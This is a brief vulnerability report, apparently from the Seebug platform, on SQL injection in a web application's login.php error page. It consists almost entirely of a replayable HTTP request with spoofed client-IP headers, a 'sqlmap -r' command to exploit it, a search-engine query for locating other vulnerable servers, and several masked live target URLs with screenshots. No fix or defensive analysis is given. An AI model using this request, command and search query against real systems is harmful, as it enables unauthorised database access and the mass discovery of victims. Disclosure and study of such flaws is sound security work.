### Brief description:
As titled.
### Details:
```
GET /login.php?Cmd=error&Code=-1&Lang= HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: domain=admin; Hm_lvt_44f9b083c78d9d3c1e736e5ae3a4aff8=1442311545; PHPSESSID=81ooh6cslbmb1uple6k6rlaad1; LoginDomain=**.**.**.**#
X-Forwarded-For: **.**.**.**
X-Remote-Addr: **.**.**.**
X-Originating-IP: **.**.**.**
X-Remote-IP: **.**.**.**
```
Save the request as 1.txt, then run `sqlmap -r 1.txt`
[![1.png](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)
### Proof of vulnerability:
Search by keyword: inurl:login.php?Cmd=error
Three cases are provided. The others were not tested one by one.
http://**.**.**.**/login.php?Cmd=error&Code=-1
http://**.**.**.**/login.php?Cmd=error&Code=-3&Lang=
http://**.**.**.**/login.php?Cmd=error&Code=-3
[![1.png](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)](https://images.seebug.org/upload/201510/16164958b5e30864a87ce6cb3e8a56015a2c6532.png)
http://**.**.**.**/login.php?Cmd=error&Code=-1
[![1.png](https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png)](https://images.seebug.org/upload/201510/1513464400c6077faced4f302f99aff2e18bf274.png)
[![1.png](https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png)](https://images.seebug.org/upload/201510/15141603407624a38bd1e4e3fb8dbab192879d93.png)